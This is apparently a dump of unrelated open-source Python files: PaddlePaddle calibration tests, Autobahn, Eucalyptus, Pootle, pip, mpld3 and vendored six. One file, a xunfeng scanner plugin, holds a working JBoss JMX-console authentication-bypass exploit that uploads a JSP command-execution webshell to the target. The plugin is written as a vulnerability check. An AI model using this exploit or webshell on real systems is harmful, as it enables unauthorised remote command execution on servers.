            if os.path.exists(int8_model):
                os.system("rm -rf " + int8_model)
                os.system("mkdir " + int8_model)

            calibrator = int8_utility.Calibrator(
                program=infer_program,
                pretrained_model=model_path,
                algo=algo,
                exe=exe,
                output=int8_model,
                feed_var_names=feed_dict,
                fetch_list=fetch_targets)

        test_info = []   # per-batch accuracy weighted by batch size
        cnt = 0          # total images processed
        periods = []     # per-batch wall-clock times
        for batch_id, data in enumerate(val_reader()):
            image = np.array(
                [x[0].reshape(image_shape) for x in data]).astype("float32")
            label = np.array([x[1] for x in data]).astype("int64")
            label = label.reshape([-1, 1])
            # calibration runs the sampling program; plain inference does not
            running_program = calibrator.sampling_program.clone(
            ) if generate_int8 else infer_program.clone()

            t1 = time.time()
            _, acc1, _ = exe.run(
                running_program,
                feed={feed_dict[0]: image,
                      feed_dict[1]: label},
                fetch_list=fetch_targets)
            t2 = time.time()
            period = t2 - t1
            periods.append(period)

            if generate_int8:
                calibrator.sample_data()

            test_info.append(np.mean(acc1) * len(data))
            cnt += len(data)

            if (batch_id + 1) % 100 == 0:
                print("{0} images,".format(batch_id + 1))
                sys.stdout.flush()
            if (batch_id + 1) == iterations:
                break

        if generate_int8:
            calibrator.save_int8_model()

            print(
                "Calibration is done and the corresponding files are generated at {}".
                format(os.path.abspath("calibration_out")))
        else:
            throughput = cnt / np.sum(periods)
            latency = np.average(periods)
            acc1 = np.sum(test_info) / cnt
            return (throughput, latency, acc1)

    def test_calibration(self):
        """FP32 inference -> calibration -> INT8 inference; assert accuracy loss < 1%."""
        self.download_model()
        # fix: print the formatted strings (were Py2-only print statement forms)
        print("Start FP32 inference for {0} on {1} images ...".format(
            self.model, self.infer_iterations))
        (fp32_throughput, fp32_latency,
         fp32_acc1) = self.run_program(self.model_cache_folder + "/model")
        print("Start INT8 calibration for {0} on {1} images ...".format(
            self.model, self.sample_iterations))
        self.run_program(
            self.model_cache_folder + "/model", True, algo=self.algo)
        print("Start INT8 inference for {0} on {1} images ...".format(
            self.model, self.infer_iterations))
        (int8_throughput, int8_latency,
         int8_acc1) = self.run_program("calibration_out")
        delta_value = fp32_acc1 - int8_acc1
        self.assertLess(delta_value, 0.01)
        print(
            "FP32 {0}: batch_size {1}, throughput {2} images/second, latency {3} second, accuracy {4}".
            format(self.model, self.batch_size, fp32_throughput, fp32_latency,
                   fp32_acc1))
        print(
            "INT8 {0}: batch_size {1}, throughput {2} images/second, latency {3} second, accuracy {4}".
            format(self.model, self.batch_size, int8_throughput, int8_latency,
                   int8_acc1))
        sys.stdout.flush()
class TestCalibrationForMobilenetv1(TestCalibrationForResnet50):
    """Same calibration flow as ResNet-50 but with the MobileNet-V1 FP32 model
    and the KL-divergence calibration algorithm."""
    def download_model(self):
        # mobilenetv1 fp32 data
        data_urls = [
            'http://paddle-inference-dist.bj.bcebos.com/int8/mobilenetv1_int8_model.tar.gz'
        ]
        data_md5s = ['13892b0716d26443a8cdea15b3c6438b']
        self.model_cache_folder = self.download_data(data_urls, data_md5s,
                                                     "mobilenetv1_fp32")
        self.model = "MobileNet-V1"
        self.algo = "KL"
# run the calibration tests when invoked directly
if __name__ == '__main__':
    unittest.main()
| apache-2.0 |
D3f0/AutobahnPython | autobahn/autobahn/compress.py | 12 | 2860 | ###############################################################################
##
## Copyright 2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
# public API of this module; extended below when optional codecs are present
__all__ = ["PerMessageCompressOffer",
           "PerMessageCompressOfferAccept",
           "PerMessageCompressResponse",
           "PerMessageCompressResponseAccept",
           "PerMessageCompress",
           "PerMessageDeflateOffer",
           "PerMessageDeflateOfferAccept",
           "PerMessageDeflateResponse",
           "PerMessageDeflateResponseAccept",
           "PerMessageDeflate",
           "PerMessageBzip2Offer",
           "PerMessageBzip2OfferAccept",
           "PerMessageBzip2Response",
           "PerMessageBzip2ResponseAccept",
           "PerMessageBzip2",
           "PERMESSAGE_COMPRESSION_EXTENSION"
           ]

from compress_base import *
from compress_deflate import *
from compress_bzip2 import *

## class for "permessage-deflate" and "permessage-bzip2" are always available
##
# registry mapping WebSocket extension name -> the classes implementing each
# phase of its negotiation (offer, accept, response) plus the codec itself
PERMESSAGE_COMPRESSION_EXTENSION = {

   PerMessageDeflateMixin.EXTENSION_NAME: {
      'Offer': PerMessageDeflateOffer,
      'OfferAccept': PerMessageDeflateOfferAccept,
      'Response': PerMessageDeflateResponse,
      'ResponseAccept': PerMessageDeflateResponseAccept,
      'PMCE': PerMessageDeflate},

   PerMessageBzip2Mixin.EXTENSION_NAME: {
      'Offer': PerMessageBzip2Offer,
      'OfferAccept': PerMessageBzip2OfferAccept,
      'Response': PerMessageBzip2Response,
      'ResponseAccept': PerMessageBzip2ResponseAccept,
      'PMCE': PerMessageBzip2}
}


## include "permessage-snappy" classes if Snappy is available
##
# optional: registered only when the third-party snappy package imports cleanly
try:
   import snappy
   from compress_snappy import *

   PMCE = {
      'Offer': PerMessageSnappyOffer,
      'OfferAccept': PerMessageSnappyOfferAccept,
      'Response': PerMessageSnappyResponse,
      'ResponseAccept': PerMessageSnappyResponseAccept,
      'PMCE': PerMessageSnappy
   }

   PERMESSAGE_COMPRESSION_EXTENSION[PerMessageSnappyMixin.EXTENSION_NAME] = PMCE

   __all__.extend(["PerMessageSnappyOffer",
                   "PerMessageSnappyOfferAccept",
                   "PerMessageSnappyResponse",
                   "PerMessageSnappyResponseAccept",
                   "PerMessageSnappy"])

except ImportError:
   pass
| apache-2.0 |
superhuahua/xunfengES | celerynode/vuldb/jboss_head.py | 2 | 2482 | # coding:utf-8
# author:wolf
import urllib2
import socket
import time
import random
def get_plugin_info():
    """Return the static metadata record describing this scanner plugin."""
    # Metadata consumed by the scanning framework; keys and values must
    # stay exactly as registered.
    return {
        "name": "Jboss 认证绕过",
        "info": "通过Head请求可绕过Jboos的登陆认证,攻击者可通过此漏洞直接获取服务器权限。",
        "level": "高危",
        "type": "认证绕过",
        "author": "wolf@YSRC",
        "url": "https://access.redhat.com/solutions/30744",
        "keyword": "tag:jboss",
        "source": 1,
    }
def random_str(len):
    """Return a random string of the requested length drawn from "ABCDEFGH".

    Note: the parameter name shadows the builtin ``len``; it is kept
    unchanged for backward compatibility with existing callers.
    """
    # One random.choice call per character, exactly like the original
    # append loop, so output is identical for a given random seed; the
    # join avoids repeated string concatenation.
    return "".join(random.choice("ABCDEFGH") for _ in range(len))
def check(host, port, timeout):
    """Probe host:port for the JBoss JMX-console HEAD auth-bypass.

    Uploads a JSP page through the DeploymentFileRepository MBean using a
    HEAD request (which bypasses authentication on vulnerable installs),
    then fetches the deployed page to confirm. Returns an info string on
    success, None otherwise.

    NOTE(review): Python 2 only (urllib2, `except Exception, e` syntax).
    """
    try:
        socket.setdefaulttimeout(timeout)
        s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s1.connect((host, int(port)))
        # JSP command-execution page that the MBean call below deploys.
        shell = """<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>"""
        # s1.recv(1024)
        shellcode = ""
        # Random 5-char deployment name so repeated scans do not collide.
        name = random_str(5)
        # Percent-encode every byte of the JSP payload for the query string.
        for v in shell:
            shellcode += hex(ord(v)).replace("0x", "%")
        # HEAD request invoking DeploymentFileRepository.store to write the
        # payload as <name>.war/xunfeng.jsp on the server.
        flag = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=" + \
            "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=xunfeng&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % (
                name) + shellcode + \
            "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"
        s1.send(flag)
        data = s1.recv(512)
        s1.close()
        # Give the server time to unpack and deploy the uploaded .war.
        time.sleep(10)
        url = "http://%s:%d" % (host, int(port))
        webshell_url = "%s/%s/xunfeng.jsp" % (url, name)
        res = urllib2.urlopen(webshell_url, timeout=timeout)
        # The deployed page contains a form named 'comments' when it worked.
        if 'comments' in res.read():
            info = u"Jboss Authentication bypass webshell:%s" % (webshell_url)
            return info
    except Exception, e:
        # Best-effort probe: any network/HTTP failure is treated as
        # "not vulnerable" and the function falls through to return None.
        pass
| gpl-3.0 |
djeraseit/eucalyptus | clc/eucadmin/eucadmin/describetokens.py | 6 | 1513 | # Copyright 2011-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import eucadmin.describerequest
class DescribeTokens(eucadmin.describerequest.DescribeRequest):
    """Admin request that lists the Eucalyptus Tokens services."""

    # Service identifier consumed by the DescribeRequest base class.
    ServiceName = 'Tokens'
    # Help text shown for this command.
    Description = 'List Tokens services.'
| gpl-3.0 |
JohnnyKing94/pootle | tests/pootle_language/panels.py | 7 | 1800 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from django.template import loader
from pootle.core.browser import get_table_headings
from pootle.core.delegate import panels
from pootle_app.models.permissions import get_matching_permissions
from pootle_app.panels import ChildrenPanel
from pootle_language.views import LanguageBrowseView
@pytest.mark.django_db
def test_panel_language_table(language0, rf, member):
    """Check ChildrenPanel wiring for a language browse view.

    Verifies that the panel registry exposes only the "children" panel
    and that the panel's cache key, table payload, context data and
    rendered content all derive from the view as expected.
    """
    # Build a request for the language page and attach the member's
    # permissions; the view/panel code reads request.permissions.
    request = rf.get('/language0/')
    request.user = member
    request.permissions = get_matching_permissions(
        request.user,
        language0.directory)
    # Instantiate the browse view by hand (no URL routing in this test).
    view = LanguageBrowseView(
        kwargs=dict(language_code=language0.code))
    view.request = request
    view.object = view.get_object()
    # The panel registry for this view class exposes exactly one panel.
    # NOTE(review): keys() compared to a list - Python 2 dict semantics.
    lang_panels = panels.gather(LanguageBrowseView)
    assert lang_panels.keys() == ["children"]
    assert lang_panels["children"] == ChildrenPanel
    panel = ChildrenPanel(view)
    assert panel.panel_name == "children"
    # Cache key is derived from the panel name and the view's cache key.
    assert (
        panel.cache_key
        == ("panel.%s.%s"
            % (panel.panel_name, view.cache_key)))
    # Expected table structure, assembled from the view's own fields.
    table = {
        'id': view.view_name,
        'fields': panel.table_fields,
        'headings': get_table_headings(panel.table_fields),
        'rows': view.object_children}
    assert panel.table == table
    assert panel.get_context_data() == dict(
        table=table, can_translate=view.can_translate)
    # Rendered panel content must match the template output after the
    # panel's update_times post-processing.
    content = loader.render_to_string(
        panel.template_name, context=panel.get_context_data())
    assert (
        panel.content
        == panel.update_times(content))
| gpl-3.0 |
luzfcb/pip | pip/commands/freeze.py | 311 | 2330 | from __future__ import absolute_import
import sys
import pip
from pip.basecommand import Command
from pip.operations.freeze import freeze
from pip.wheel import WheelCache
class FreezeCommand(Command):
    """
    Output installed packages in requirements format.
    packages are listed in a case-insensitive sorted order.
    """
    name = 'freeze'
    usage = """
      %prog [options]"""
    summary = 'Output installed packages in requirements format.'
    # Route log output to stderr so stdout carries only the requirements
    # text (commonly redirected to a file).
    log_streams = ("ext://sys.stderr", "ext://sys.stderr")
    def __init__(self, *args, **kw):
        """Register the command-line options accepted by `pip freeze`."""
        super(FreezeCommand, self).__init__(*args, **kw)
        # Mirror the ordering/comments of an existing requirements file.
        self.cmd_opts.add_option(
            '-r', '--requirement',
            dest='requirement',
            action='store',
            default=None,
            metavar='file',
            help="Use the order in the given requirements file and its "
                 "comments when generating output.")
        # Extra index locations to emit as --find-links lines.
        self.cmd_opts.add_option(
            '-f', '--find-links',
            dest='find_links',
            action='append',
            default=[],
            metavar='URL',
            help='URL for finding packages, which will be added to the '
                 'output.')
        self.cmd_opts.add_option(
            '-l', '--local',
            dest='local',
            action='store_true',
            default=False,
            help='If in a virtualenv that has global access, do not output '
                 'globally-installed packages.')
        self.cmd_opts.add_option(
            '--user',
            dest='user',
            action='store_true',
            default=False,
            help='Only output packages installed in user-site.')
        self.parser.insert_option_group(0, self.cmd_opts)
    def run(self, options, args):
        """Collect frozen requirement lines and write them to stdout."""
        # No wheel format restrictions apply when freezing.
        format_control = pip.index.FormatControl(set(), set())
        wheel_cache = WheelCache(options.cache_dir, format_control)
        # Forward the parsed CLI options to the freeze operation.
        freeze_kwargs = dict(
            requirement=options.requirement,
            find_links=options.find_links,
            local_only=options.local,
            user_only=options.user,
            skip_regex=options.skip_requirements_regex,
            isolated=options.isolated_mode,
            wheel_cache=wheel_cache)
        for line in freeze(**freeze_kwargs):
            sys.stdout.write(line + '\n')
| mit |
giserh/mpld3 | examples/custom_plugin.py | 21 | 2557 | """
Defining a Custom Plugin
========================
Test the custom plugin demoed on the `Pythonic Perambulations
<http://jakevdp.github.io/blog/2014/01/10/d3-plugins-truly-interactive/>`_
blog. Hover over the points to see the associated sinusoid.
Use the toolbar buttons at the bottom-right of the plot to enable zooming
and panning, and to reset the view.
"""
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import mpld3
from mpld3 import plugins, utils
class LinkedView(plugins.PluginBase):
    """A simple plugin showing how multiple axes can be linked"""
    # Client-side d3/mpld3 plugin: on mouseover of a scatter point, the
    # companion line is re-drawn with that point's data series.
    JAVASCRIPT = """
    mpld3.register_plugin("linkedview", LinkedViewPlugin);
    LinkedViewPlugin.prototype = Object.create(mpld3.Plugin.prototype);
    LinkedViewPlugin.prototype.constructor = LinkedViewPlugin;
    LinkedViewPlugin.prototype.requiredProps = ["idpts", "idline", "data"];
    LinkedViewPlugin.prototype.defaultProps = {}
    function LinkedViewPlugin(fig, props){
        mpld3.Plugin.call(this, fig, props);
    };
    LinkedViewPlugin.prototype.draw = function(){
      var pts = mpld3.get_element(this.props.idpts);
      var line = mpld3.get_element(this.props.idline);
      var data = this.props.data;
      function mouseover(d, i){
        line.data = data[i];
        line.elements().transition()
            .attr("d", line.datafunc(line.data))
            .style("stroke", this.style.fill);
      }
      pts.elements().on("mouseover", mouseover);
    };
    """
    def __init__(self, points, line, linedata):
        """Link a scatter collection to a line.

        points: scatter artist (Line2D or collection) whose hover drives
            the update; line: the Line2D to redraw; linedata: per-point
            series, one [[x, y], ...] list per scatter point.
        """
        # Line2D-based scatters need the "pts" suffix for mpld3 id lookup.
        if isinstance(points, matplotlib.lines.Line2D):
            suffix = "pts"
        else:
            suffix = None
        # Props handed to the JS side; keys match requiredProps above.
        self.dict_ = {"type": "linkedview",
                      "idpts": utils.get_id(points, suffix),
                      "idline": utils.get_id(line),
                      "data": linedata}
# Two stacked axes: ax[0] shows the selected sinusoid, ax[1] the scatter.
fig, ax = plt.subplots(2)
# scatter periods and amplitudes
np.random.seed(0)  # fixed seed so the example is reproducible
P = 0.2 + np.random.random(size=20)
A = np.random.random(size=20)
x = np.linspace(0, 10, 100)
# One sinusoid per scatter point: shape (20, 2, 100) as [x, A*sin(x/P)].
data = np.array([[x, Ai * np.sin(x / Pi)]
                 for (Ai, Pi) in zip(A, P)])
points = ax[1].scatter(P, A, c=P + A,
                       s=200, alpha=0.5)
ax[1].set_xlabel('Period')
ax[1].set_ylabel('Amplitude')
# create the line object
lines = ax[0].plot(x, 0 * x, '-w', lw=3, alpha=0.5)
ax[0].set_ylim(-1, 1)
ax[0].set_title("Hover over points to see lines")
# transpose line data and add plugin
# (the JS side expects per-point [[x, y], ...] pairs, hence (0, 2, 1))
linedata = data.transpose(0, 2, 1).tolist()
plugins.connect(fig, LinkedView(points, lines[0], linedata))
mpld3.show()
| bsd-3-clause |
kushalbhola/MyStuff | venv/Lib/site-packages/setuptools/_vendor/six.py | 2715 | 30098 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.10.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY34 = sys.version_info[0:2] >= (3, 4)
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
    """Attach *doc* as the docstring of *func*."""
    setattr(func, "__doc__", doc)
def _import_module(name):
    """Import a module by dotted *name* and return the leaf module.

    Unlike a bare ``__import__``, this returns the module named by the
    last dotted component rather than the top-level package.
    """
    __import__(name)
    module = sys.modules[name]
    return module
class _LazyDescr(object):
    """Descriptor that resolves its value on first attribute access.

    Subclasses implement ``_resolve()``; the result is cached on the
    owning instance and the descriptor then removes itself from the class.
    """
    def __init__(self, name):
        self.name = name
    def __get__(self, obj, tp):
        result = self._resolve()
        setattr(obj, self.name, result) # Invokes __set__.
        try:
            # This is a bit ugly, but it avoids running this again by
            # removing this descriptor.
            delattr(obj.__class__, self.name)
        except AttributeError:
            pass
        return result
class MovedModule(_LazyDescr):
    """Lazy reference to a module that moved between Python 2 and 3.

    ``old`` is the Python 2 module name; ``new`` (defaulting to the
    public *name*) is the Python 3 name. Resolution imports whichever
    applies to the running interpreter.
    """
    def __init__(self, name, old, new=None):
        super(MovedModule, self).__init__(name)
        if PY3:
            if new is None:
                new = name
            self.mod = new
        else:
            self.mod = old
    def _resolve(self):
        # Import the target module only when first needed.
        return _import_module(self.mod)
    def __getattr__(self, attr):
        _module = self._resolve()
        value = getattr(_module, attr)
        # Cache the looked-up attribute so __getattr__ is not hit again.
        setattr(self, attr, value)
        return value
# Module subclass whose attributes are lazy descriptors; __dir__ reports
# the moved names so tab-completion works before anything is resolved.
# (Intentionally no class docstring: __init__ copies the *subclass*
# docstring onto the module instance.)
class _LazyModule(types.ModuleType):
    def __init__(self, name):
        super(_LazyModule, self).__init__(name)
        self.__doc__ = self.__class__.__doc__
    def __dir__(self):
        attrs = ["__doc__", "__name__"]
        attrs += [attr.name for attr in self._moved_attributes]
        return attrs
    # Subclasses should override this
    _moved_attributes = []
class MovedAttribute(_LazyDescr):
    """Lazy reference to an attribute that moved between Python 2 and 3."""
    def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
        super(MovedAttribute, self).__init__(name)
        if PY3:
            if new_mod is None:
                new_mod = name
            self.mod = new_mod
            # Default the Python 3 attribute name to the old attribute
            # name, then to the public name itself.
            if new_attr is None:
                if old_attr is None:
                    new_attr = name
                else:
                    new_attr = old_attr
            self.attr = new_attr
        else:
            self.mod = old_mod
            if old_attr is None:
                old_attr = name
            self.attr = old_attr
    def _resolve(self):
        # Import the owning module, then pull the attribute from it.
        module = _import_module(self.mod)
        return getattr(module, self.attr)
class _SixMetaPathImporter(object):
    """
    A meta path importer to import six.moves and its submodules.
    This class implements a PEP302 finder and loader. It should be compatible
    with Python 2.5 and all existing versions of Python3
    """
    def __init__(self, six_module_name):
        self.name = six_module_name
        # Maps fully-qualified names ("<six>.moves.foo") to module objects
        # or MovedModule placeholders.
        self.known_modules = {}
    def _add_module(self, mod, *fullnames):
        # Register *mod* under one or more dotted suffixes of this package.
        for fullname in fullnames:
            self.known_modules[self.name + "." + fullname] = mod
    def _get_module(self, fullname):
        return self.known_modules[self.name + "." + fullname]
    def find_module(self, fullname, path=None):
        # PEP 302 finder: claim only names we registered.
        if fullname in self.known_modules:
            return self
        return None
    def __get_module(self, fullname):
        try:
            return self.known_modules[fullname]
        except KeyError:
            raise ImportError("This loader does not know module " + fullname)
    def load_module(self, fullname):
        # PEP 302 loader: honour sys.modules, resolve placeholders, and
        # publish the result under the requested name.
        try:
            # in case of a reload
            return sys.modules[fullname]
        except KeyError:
            pass
        mod = self.__get_module(fullname)
        if isinstance(mod, MovedModule):
            mod = mod._resolve()
        else:
            mod.__loader__ = self
        sys.modules[fullname] = mod
        return mod
    def is_package(self, fullname):
        """
        Return true, if the named module is a package.
        We need this method to get correct spec objects with
        Python 3.4 (see PEP451)
        """
        return hasattr(self.__get_module(fullname), "__path__")
    def get_code(self, fullname):
        """Return None
        Required, if is_package is implemented"""
        self.__get_module(fullname) # eventually raises ImportError
        return None
    get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"),
MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
]
# Add windows specific modules.
if sys.platform == "win32":
_moved_attributes += [
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
